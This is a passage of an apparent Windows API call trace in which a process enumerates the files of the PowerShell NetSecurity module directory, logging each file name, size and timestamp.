nFileSizeHigh=0x0, nFileSizeLow=0x994b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecRule.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.461] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20fee, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.formats.ps1xml", cAlternateFileName="")) returned 1 [0177.461] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.psd1", cAlternateFileName="")) returned 1 [0177.462] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12106, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.types.ps1xml", cAlternateFileName="")) returned 1 [0177.462] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12106, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.types.ps1xml", cAlternateFileName="")) returned 0 [0177.462] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.463] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.463] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5928b0 [0177.465] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.465] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0177.465] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.Firewall.Commands.dll", cAlternateFileName="")) returned 1 [0177.465] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf01, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallAddressFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.466] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xca0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallApplicationFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.466] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xbe5, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallInterfaceFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.466] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.466] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1300, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallPortFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.467] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2077, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallProfile.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.467] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7a32, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallRule.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.467] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x15b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallSecurityFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.467] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallServiceFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.467] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x18ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallSetting.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.468] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x75d, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetGPO.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.468] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f27, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecDospSetting.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.468] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x53e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecIdentity.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.468] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x32ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.468] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4162, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecMainModeRule.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.469] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x825, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecMainModeSA.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.469] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2d50, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecPhase1AuthSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.469] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2b0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecPhase2AuthSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.469] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecPolicyChange.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.470] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e77, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.470] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xea7, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecQuickModeSA.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.470] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x994b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPsecRule.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.470] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20fee, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.formats.ps1xml", cAlternateFileName="")) returned 1 [0177.470] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.psd1", cAlternateFileName="")) returned 1 [0177.470] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12106, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity.types.ps1xml", cAlternateFileName="")) returned 1 [0177.471] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.471] FindClose (in: hFindFile=0x1a5928b0 | out: hFindFile=0x1a5928b0) returned 1 [0177.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.481] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity", lpFilePart=0x0) returned 0x3e [0177.481] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.481] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netsecurity"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0177.481] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.481] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.481] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity", lpFilePart=0x0) returned 0x3e [0177.481] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\", lpFilePart=0x0) returned 0x3f [0177.481] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592a30 [0177.482] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.483] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0177.483] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.Firewall.Commands.dll", cAlternateFileName="")) returned 1 [0177.483] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf01, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallAddressFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.483] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xca0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallApplicationFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.483] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xbe5, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFirewallInterfaceFilter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.483] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, 